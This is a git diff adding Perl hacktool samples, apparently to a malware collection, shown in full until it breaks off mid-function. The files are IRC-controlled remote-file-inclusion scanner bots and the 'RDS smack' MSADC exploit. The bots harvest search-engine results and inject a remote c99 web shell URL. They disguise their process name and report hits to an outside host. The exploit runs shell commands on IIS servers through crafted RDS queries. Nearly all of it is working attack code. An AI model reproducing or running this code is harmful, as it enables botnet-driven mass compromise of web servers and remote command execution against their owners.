+$sk->autoflush(1); +print $sk "NICK $nick\r\n"; +print $sk "USER Google 8 * : Google : google@google.it : Google :Google\r\n"; +print $sk "JOIN $chan\r\n"; +print $sk "PRIVMSG $chan :3,1[9S3,1can-Bot] Scan is 3ON1 : 9!scan \r\n"; + +while($line = <$sk>){ + +$line =~ s/\r\n$//; +if ($line=~ /^PING \:(.*)/) +{ +print "PONG :$1"; +print $sk "PONG :$1"; +} + +if ($line=~ /PRIVMSG $chan :.deletebot/){ +stampa($sk, "QUIT"); +} + +if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my ($type,$space); +my %hosts; +stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Started:9 $bug 3 Dork:9 $dork 3Engine:9 Google "); +my @glist=&google($dork); +stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Google Found:9 ".scalar(@glist)."3 Sites!"); +push(my @tot, @glist); +my @puliti=&unici(@tot); +stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Cleaned results: 9 ".scalar(@puliti)."3 Sites!"); +stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Exploting started! "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %30==0){ +} +if ($contatore==$uni-1){ +stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Scan Finished9 $dork"); +} +my $test="http://".$sito.$bug.$cmd."?"; +my $print="http://".$sito.$bug.$printcmd."?"; +my $vuln="http://".$sito.$bug.""; +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /31337/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space,$ker)=split(/\,/,$x); +stampa($sk, "PRIVMSG $chan :3,1[9S3afe9OFF3] 3,1[9S3ys9 ".$type."3] 3,1[9F3ree9 ".$space." 9] $print "); +stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]9 $ker  "); +checksafemode("$print");}} +elsif($re =~ /31337/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space,$ker)=split(/\,/,$x); +stampa($sk, "PRIVMSG $chan :3,1[9S3afe14ON3] 3,1[9S3ys14 ".$type."3] 3,1[9F3ree14 ".$space." 3]14 $print "); +stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]14 $ker  "); +checksafemode("$print");}} +}}} +exit; +}}} + + +sub stampa() +{ +if ($#_ == '1') { +my $sk = $_[0]; +print $sk "$_[1]\n"; +} else { +print $sk "$_[0]\n"; +}} + +sub os(){ +my $sito=$_[0]; +my $Res=query($sito); +my $type; +my $space; +my $ker; +my $str; +while($Res=~m/
    OSTYPE:(.+?)\
    /g){ +$type=$1; +} +while($Res=~m/
    Kernel:(.+?)\
    /g){ +$ker=$1; +} +while($Res=~m/
    Free:(.+?)\
    /g){ +$space=$1; +} +$str=$type.",".$space.",".$ker; +return $str; +} +sub google(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b); +my $Res=query($Go); +while($Res =~ m/\"]*)\//g){ +if ($1 !~ /google/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub links() +{ +my @l; +my $link=$_[0]; +my $host=$_[0]; +my $hdir=$_[0]; +$hdir=~s/(.*)\/[^\/]*$/\1/; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$host.="/"; +$link.="/"; +$hdir.="/"; +$host=~s/\/\//\//g; +$hdir=~s/\/\//\//g; +$link=~s/\/\//\//g; +push(@l,$link,$host,$hdir); +return @l; +} + +sub geths(){ +my $host=$_[0]; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +return $host; +} + +sub key(){ +my $chiave=$_[0]; +$chiave =~ s/ /\+/g; +$chiave =~ s/:/\%3A/g; +$chiave =~ s/\//\%2F/g; +$chiave =~ s/&/\%26/g; +$chiave =~ s/\"/\%22/g; +$chiave =~ s/,/\%2C/g; +$chiave =~ s/\\/\%5C/g; +return $chiave; +} + +sub query($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$host=~s/href=\"?http:\/\///; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +return $page; +} + + +sub checksafemode($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"tckct.co.uk",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET /logfiles/CDPW3U1032/safe.php?url=$query HTTP/1.0\r\nHost: tckct.co.uk\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +} + + +sub unici{ +my @unici = (); +my %visti = (); +foreach my $elemento ( @_ ) +{ +next if $visti{ $elemento }++; +push @unici, $elemento; +} +return @unici; +} + diff --git a/Perl/HackTool.Perl.IrBot.d b/Perl/HackTool.Perl.IrBot.d new file mode 100644 index 00000000..b14f455e --- /dev/null +++ b/Perl/HackTool.Perl.IrBot.d @@ -0,0 +1,438 @@ +#Mic22 Is Here! + +use IO::Socket::INET; +use HTTP::Request; +use LWP::UserAgent; + +my $processo = "/usr/local/apache/bin/httpd -DSSL"; +my $cmd="http://by-gardenfox.t35.com/c99.txt?"; +my $server="irc.milw0rm.com"; +my $porta="6667"; +my $nick="[ScaN-RoX]"; +my $canale="#army"; +my $verbot = "6.51"; +my @adms=("joiner"); +my $pid=fork; +exit if $pid; +$0="$processo"."\0"x16; +my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n"; +$sk->autoflush(1); +print $sk "NICK $nick\r\n"; +print $sk "USER Shinchi 13 * : henca : henca@prohosts.org : Shinchi :henca\r\n"; +print $sk "JOIN $canale\r\n"; + +while($line = <$sk>){ + +$line =~ s/\r\n$//; +if ($line=~ /^PING \:(.*)/) +{ +print "PONG :$1"; +print $sk "PONG :$1"; +} + +if ($line=~ /PRIVMSG $canale :.out/){ +stampa($sk, "QUIT"); +} + + +if ($line=~ /PRIVMSG $canale :.help/){ +stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 6Scanner RFI Ver $verbot (C)Mic22 , 3Color By 10Shinchi12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2ketik 4.scan Bug Dork 12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.engine 2Untuk melihat searce engine yang digunakan 12::."); +stampa($sk, "PRIVMSG $canale :12.::[13bantuan] 2Ketik 7.mwultimi 2Untuk Melihat Bug di milworm 12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.info 2Untuk Melihat status Bot/System 12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.out 2Untuk Matikan Bot 12::."); +} + +if ($line=~ /PRIVMSG $canale :.info/){ +my $sysos = `uname -sr`; +my $uptime = `uptime`; +if ($sysos =~ /freebsd/i ) { +$sysname = `hostname`; +$memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`; +$swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`; +chomp($memory); +chomp($swap); +} +elsif ( $sysos =~ /linux/i ) { +$sysname = `hostname -f`; +$memory = `free -m |grep -i mem | awk '{print \$2}'`; +$swap = `free -m |grep -i swap | awk '{print \$2}'`; +chomp($swap); +chomp($memory); +} +else { +$sysname ="No Found";; +$memory ="No found"; +$swap ="No Found"; +} +$uptime=~s/\n//g; +$sysname=~s/\n//g; +$sysos=~s/\n//g; +stampa($sk, "PRIVMSG $canale :12.::[13Info] Server: $server :| - $porta12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Info] SO/Hostname:12 $sysos - $sysname12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Info] Process/PID:12 $processo - $$12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Info] Uptime:12 $uptime12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Info] Memory/Swap:12 $memory - $swap12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Info] Perl Version/BOT:12 $] - $verbot12::."); +} + + +if ($line=~ /PRIVMSG $canale :.engine/){ +stampa($sk, "PRIVMSG $canale :12.::[13Engine] 2Google, Yahoo, MsN, Altavista, Libero, AllTheWeb, AsK, UoL, AoL 12::."); +} + +if ($line=~ /PRIVMSG $canale :.mwultimi/){ +my @ltt=(); +my @bug=(); +my $x; +my $page=""; +my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; +print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$socke>; +$page="@r"; +close($socke); +while ($page =~ m/(.*)</g){ +$x = $1; +if ($x =~ /\<\;/) { +$x =~ s/\<\;/</g; +} +if ($x !~ /milw0rm/) { +push (@bug,$x); +}} +while ($page =~ m/<link.*expl.*([0-9]...)</g) { +if ($1 !~ m/milw0rm.com|exploits|en/){ +push (@ltt,"http://www.milw0rm.com/exploits/$1 "); +}} +stampa($sk, "PRIVMSG $canale :12.::[13MillW0rm] 7Last Bug di milw0rm 12::."); +foreach $x (0..(@ltt - 1)) { +stampa($sk, "PRIVMSG $canale :12.::[13MillW0rm] list Bug Milw0rm $bug[$x] - $ltt[$x] 12::."); +sleep 1; +}} + +if ($line=~ /PRIVMSG $canale :.scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my ($type,$space); +my %hosts; +stampa($sk, "PRIVMSG $canale :12.::[13Dork] $dork12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Bug] $bug12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Loading] 2Tunggu yach.. Yayang Lagi Mulai neh!12::."); +stampa($sk, "PRIVMSG $canale :12.::[13Google] Sabar yach Say.. Lagi scan nih!12::."); +my @glist=&google($dork); +stampa($sk, "PRIVMSG $canale :12.::[13Yahoo] Sabar yach Say.. Lagi scan nih!12::."); +my @ylist=&yahoo($dork); +stampa($sk, "PRIVMSG $canale :12.::[13Msn] Sabar yach Say.. Lagi scan nih!12::."); +my @mlist=&msn($dork); +stampa($sk, "PRIVMSG $canale :12.::[13Altavista] Sabar yach Say.. Lagi scan nih!12::."); +my @alist=&altavista($dork); +stampa($sk, "PRIVMSG $canale :12.::[13Libero] Sabar yach Say.. Lagi scan nih!12::."); +my @llist=&libero($dork); +stampa($sk, "PRIVMSG $canale :12.::[13AllTheWeb] Sabar yach Say.. Lagi scan nih!12::."); +my @allist=&alltheweb($dork); +stampa($sk, "PRIVMSG $canale :12.::[13AsK] Sabar yach Say.. Lagi scan nih!12::."); +my @asklist=&ask($dork); +stampa($sk, "PRIVMSG $canale :12.::[13UoL] Sabar yach Say.. Lagi scan nih!12::."); +my @uollist=&uol($dork); +stampa($sk, "PRIVMSG $canale :12.::[13AoL] Sabar yach Say.. Lagi scan nih!12::."); +my @aollist=&aol($dork); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 2Lagi Scan untuk kamu say [9Dork] $dork12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Google ".scalar(@glist)." Situs!12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Yahoo ".scalar(@ylist)." Situs!12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] MsN ".scalar(@mlist)." Situs!12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Altavista ".scalar(@alist)." Situs!12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Libero ".scalar(@llist)." Situs!12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] All-The-Web ".scalar(@allist)." Situs!12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Ask ".scalar(@asklist)." Situs!12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] UoL ".scalar(@uollist)." Situs!12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] AoL ".scalar(@aollist)." Situs!12::."); +push(my @tot, @glist, @ylist, @mlist, @alist, @llist, @allist,@asklist,@uollist,@aollist); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 12Total Scan 9,1H1,9e9,1n1,9C9,1a ".scalar(@tot)." Situs!12::."); +my @puliti=&unici(@tot); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 7Total Pencarian 9,1H1,9e9,1n1,9C9,1a ".scalar(@puliti)." Situs!12::."); +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Vulnerability 9,1H1,9e9,1n1,9C9,1a Scan!12::."); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %30==0){ +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Injekя┐╜ cinta ".$contatore." dari ".$uni. " situs12::."); +} +if ($contatore==$uni-1){ +stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Selasai [13Dork] $dork12::."); +} +my $test="http://".$sito.$bug.$cmd."?"; +my $print="http://".$sito.$bug."http://by-gardenfox.t35.com/c99.txt"."?"; +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); +stampa($sk, "PRIVMSG $canale :12.::[13Safe(12 OFF ) 4Sys(7 $type ) 6Free(14 $space )] $print12::."); +stampa($sk, "PRIVMSG MoKu :13.::[12Safe(4 OFF ) 7Sys(6 $type ) 14Free(6 $space )] $print12::."); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); +stampa($sk, "PRIVMSG $canale :12.::[2Safe(4 ON ) 6Sys(7 $type ) 7Free(6 $space )] $print12::."); +}} +}}} +exit; +}}} + + +sub stampa() +{ +if ($#_ == '1') { +my $sk = $_[0]; +print $sk "$_[1]\n"; +} else { +print $sk "$_[0]\n"; +}} + +sub os(){ +my $sito=$_[0]; +my $Res=query($sito); +my $type; +my $free; +my $str; +while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){ +$type=$1; +} +while($Res=~m/<br>Free:(.+?)\<br>/g){ +$free=$1; +} +$str=$type.",".$free; +return $str; +} + +sub aol(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=100;$b++){ +my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub google(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $Go=("http://www.google.co.id/search?hl=id&q=".key($key)."&num=100&filter=0&start=".$b); +my $Res=query($Go); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /google/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub yahoo(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=100){ +my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<em class=yschurl>(.+?)\<\/em>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub altavista(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); +my $Res=query($AlT); +while($Res=~m/<span class=ngrn>(.+?)\//g){ +if($1 !~ /altavista/){ +my $k=$1; +$k=~s/<//g; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub msn(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); +my $Res=query($MsN); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if($1 !~ /msn|live/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub libero(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0,$pg=0; $i<=1000; $i+=10,$pg++) +{ +my $Lib=("http://arianna.libero.it/search/abin/integrata.cgi?s=1&pag=".$pg."&start=".$i."&query=".key($key)); +my $Res=query($Lib); +while($Res =~ m/<a class=\"testoblu\" href=\"?http:\/\/([^>\"]*)\//g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub ask(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub alltheweb() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=100) +{ +my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); +my $Res=query($all); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub uol(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i); +my $Res=query($UoL); +while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){ +my $k=$1; +if($k!~/busca|uol|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub links() +{ +my @l; +my $link=$_[0]; +my $host=$_[0]; +my $hdir=$_[0]; +$hdir=~s/(.*)\/[^\/]*$/\1/; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$host.="/"; +$link.="/"; +$hdir.="/"; +$host=~s/\/\//\//g; +$hdir=~s/\/\//\//g; +$link=~s/\/\//\//g; +push(@l,$link,$host,$hdir); +return @l; +} + +sub geths(){ +my $host=$_[0]; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +return $host; +} + +sub key(){ +my $chiave=$_[0]; +$chiave =~ s/ /\+/g; +$chiave =~ s/:/\%3A/g; +$chiave =~ s/\//\%2F/g; +$chiave =~ s/&/\%26/g; +$chiave =~ s/\"/\%22/g; +$chiave =~ s/,/\%2C/g; +$chiave =~ s/\\/\%5C/g; +return $chiave; +} + +sub query($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$host=~s/href=\"?http:\/\///; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +return $page; +} + +sub unici{ +my @unici = (); +my %visti = (); +foreach my $elemento ( @_ ) +{ +next if $visti{ $elemento }++; +push @unici, $elemento; +} +return @unici; +} diff --git a/Perl/HackTool.Perl.Mdctr b/Perl/HackTool.Perl.Mdctr new file mode 100644 index 00000000..7e37af20 --- /dev/null +++ b/Perl/HackTool.Perl.Mdctr @@ -0,0 +1,517 @@ +# +# MSADC/RDS 'usage' (aka exploit) script version 2 +# +# by rain forest puppy +# +# - added UNC support, really didn't clean up code, but oh well + +use Socket; use Getopt::Std; +getopts("e:vd:h:XRVNwcu:s:", \%args); + +print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n"; + +if (!defined $args{h} && !defined $args{R}) { +print qq~ +Usage: msadc.pl -h <host> { -d <delay> -X -v } + -h <host> = host you want to scan (ip or domain) + -d <seconds> = delay between calls, default 1 second + -X = dump Index Server path table, if available + -N = query VbBusObj for NetBIOS name + -V = use VbBusObj instead of ActiveDataFactory + -v = verbose + -e = external dictionary file for step 5 + -u <\\\\host\\share\\file> = use UNC file + -w = Windows 95 instead of Windows NT + -c = v1 compatibility (three step query) + -s <number> = run only step <number> + + Or a -R will resume a (v2) command session + +~; exit;} + +########################################################### +# config data + +@drives=("c","d","e","f","g","h"); + +@sysdirs=("winnt","winnt35","winnt351","win","windows"); + +# we want 'wicca' first, because if step 2 made the DSN, it's ready to go +@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", + "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", + "banner", "banners", "ads", "ADCDemo", "ADCTest"); + +# this is sparse, because I don't know of many +@sysmdbs=( "\\catroot\\icatalog.mdb", + "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", + "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", + "\\system32\\certmdb.mdb", + "\\system32\\ias\\ias.mdb", + "\\system32\\ias\\dnary.mdb", + "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% +@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", + "\\cfusion\\cfapps\\forums\\forums_.mdb", + "\\cfusion\\cfapps\\forums\\data\\forums.mdb", + "\\cfusion\\cfapps\\security\\realm_.mdb", + "\\cfusion\\cfapps\\security\\data\\realm.mdb", + "\\cfusion\\database\\cfexamples.mdb", + "\\cfusion\\database\\cfsnippets.mdb", + "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", + "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", + "\\cfusion\\brighttiger\\database\\cleam.mdb", + "\\cfusion\\database\\smpolicy.mdb", + "\\cfusion\\database\cypress.mdb", + "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", + "\\website\\cgi-win\\dbsample.mdb", + "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", + "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" + ); #these are just \ +########################################################### + +$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; +if (defined $args{v}) { $verbose=1; } else {$verbose=0;} +if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} +if(!defined $args{R}){ $target= inet_aton($ip) + || die("inet_aton problems; host doesn't exist?");} +if (!defined $args{R}){ $ret = &has_msadc; } + +if (defined $args{X}) { &hork_idx; exit; } +if (defined $args{N}) { &get_name; exit; } + +if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} +if (defined $args{R}) { &load; exit; } + +print "Type the command line you want to run ($comm assumed):\n" + . "$comm "; +$in=<STDIN>; chomp $in; +$command="$comm " . $in ; + +if (!defined $args{s} || $args{s}==1){ +print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; +&try_btcustmr;} + +if (!defined $args{s} || $args{s}==2){ +print "\nStep 2: Trying to make our own DSN..."; +if (&make_dsn){ print "<<success>>\n"; sleep(3); } else { + print "<<fail>>\n"; }} # we need to sleep to let the server catchup + +if (!defined $args{s} || $args{s}==3){ +print "\nStep 3: Trying known DSNs..."; +&known_dsn;} + +if (!defined $args{s} || $args{s}==4){ +print "\nStep 4: Trying known .mdbs..."; +&known_mdb;} + +if (!defined $args{s} || $args{s}==5){ +if (defined $args{u}){ +print "\xStep 5: Trying UNC..."; +&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }} + +if (!defined $args{s} || $args{s}==6){ +if (defined $args{e}){ +print "\nStep 6: Trying dictionary of DSN names..."; +&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }} + +print "\n\nNo luck, guess you'll have to use a real hack, eh?\n"; +exit; + +############################################################################## + +sub sendraw { # this saves the whole transaction anyway + my ($pstr)=@_; + socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || + die("Socket problems\n"); + if(connect(S,pack "SnA4x8",2,80,$target)){ + open(OUT,">raw.out"); my @in; + select(S); $|=1; print $pstr; + while(<S>){ print OUT $_; push @in, $_; + print STDOUT "." if(defined $args{X});} + close(OUT); select(STDOUT); close(S); return @in; + } else { die("Can't connect...\n"); }} + +############################################################################## + +sub make_header { # make the HTTP request +my $aa, $bb; +if (defined $args{V}){ +$aa="VbBusObj.VbBusObjCls.GetRecordset"; +$bb="2"; +} else { +$aa="AdvancedDataFactory.Query"; +$bb="3";} + +$msadc=<<EOT +POST /msadc/msadcs.dll/$aa HTTP/1.1 +User-Agent: ACTIVEDATA +Host: $ip +Content-Length: $clen +Connection: Keep-Alive + +ADCClientVersion:01.06 +Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb + +--!ADM!ROX!YOUR!WORLD! +Content-Type: application/x-varg +Content-Length: $reqlen + +EOT +; +$msadc=~s/\n/\r\n/g; +return $msadc;} + +############################################################################## + +sub make_req { # make the RDS request +my ($switch, $p1, $p2)=@_; +my $req=""; my $t1, $t2, $query, $dsn; + +if ($switch==1){ # this is the btcustmr.mdb query +$query="Select * from Customers where City='|shell(\"$command\")|'"; +$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" . + $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";} + +elsif ($switch==2){ # this is general make table query +$query="create table AZZ (B int, C varchar(10))"; +$dsn="$p1";} + +elsif ($switch==3){ # this is general exploit table query +$query="select * from AZZ where C='|shell(\"$command\")|'"; +$dsn="$p1";} + +elsif ($switch==4){ # attempt to hork file info from index server +$query="select path from scope()"; +$dsn="Provider=MSIDXS;";} + +elsif ($switch==5){ # bad query +$query="select"; +$dsn="$p1";} + +elsif ($switch==6){ # this is table-independant query (new) +$query="select * from MSysModules where name='|shell(\"$command\")|'"; +$dsn="$p1";} + +$t1= make_unicode($query); +$t2= make_unicode($dsn); +if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; } +$req.= "\x08\x00" . pack ("S1", length($t1)); +$req.= "\x00\x00" . $t1 ; +$req.= "\x08\x00" . pack ("S1", length($t2)); +$req.= "\x00\x00" . $t2 ; +$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n"; +return $req;} + +############################################################################## + +sub make_unicode { # quick little function to convert to unicode +my ($in)=@_; my $out; +for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; } +return $out;} + +############################################################################## + +sub rdo_success { # checks for RDO return success (this is kludge) +my (@in) = @_; my $base=content_start(@in); +if($in[$base]=~/multipart\/mixed/){ +return 1 if( $in[$base+10]=~/^\x09\x00/ );} +return 0;} + +############################################################################## + +sub make_dsn { # this (tries to) make a DSN for us +print "\nMaking DSN: "; +foreach $drive (@drives) { +print "$drive: "; +my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" . + "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq=" + . $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n"); +$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#; +return 0 if $2 eq "404"; # not found/doesn't exist +if($2 eq "200") { + foreach $line (@results) { + return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}} +} return 0;} + +############################################################################## + +sub verify_exists { +my ($page)=@_; +my @results=sendraw("GET $page HTTP/1.0\n\n"); +return $results[0];} + +############################################################################## + +sub try_btcustmr { + +foreach $dir (@sysdirs) { + print "$dir -> "; # fun status so you 